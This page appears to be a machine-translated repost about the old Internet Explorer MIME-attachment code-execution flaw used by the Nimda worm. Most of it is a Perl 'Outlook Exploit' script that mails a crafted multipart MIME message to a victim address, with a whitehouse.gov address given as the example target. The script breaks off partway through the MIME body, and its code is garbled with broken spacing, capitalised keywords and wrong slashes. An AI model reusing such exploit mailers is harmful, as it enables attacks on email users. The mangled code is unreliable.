IE does not correctly handle the MIME format mail attachment leads to the execution of the attacker code vulnerability (NIMDA is

zhaozj2021-02-16  86

#! / usr / bin / perl #in bugtraq post user may be fooled to execute program browsing with ie5.1 #so I write a script to expedition it, just a test, have fun :) # http: // www. Xfocus.org Use mail :: sendmail; $ email = $ argv [0]; if ($ EMAIL EQ ") {print" - = Outlook Exploit = ​​- / N / N "; Print" http: // www .xfocus.org / n / n "; Print" for example: / n "; print" ./iebug.pl Someone/@whitehouse.gov/n ";}; $ a =" date: thu, 2 Nov 2000 13 : 27: 33 0100 Mime-Version: 1.0 Content-Type: Multipart / Related; Type = / "Multipart / Alternative /"; Boundary = / "1 /" x-priority: 3 x-msmail-priority: Normal X- UNSENT: 1 --1 Content-Type: Multipart / Alternative; Boundary = / "2 /" --2 Content-Type: Text / HTML; Charset = / "ISO-8859-1 /" Content-Transfer-Encoding: quoted -Printable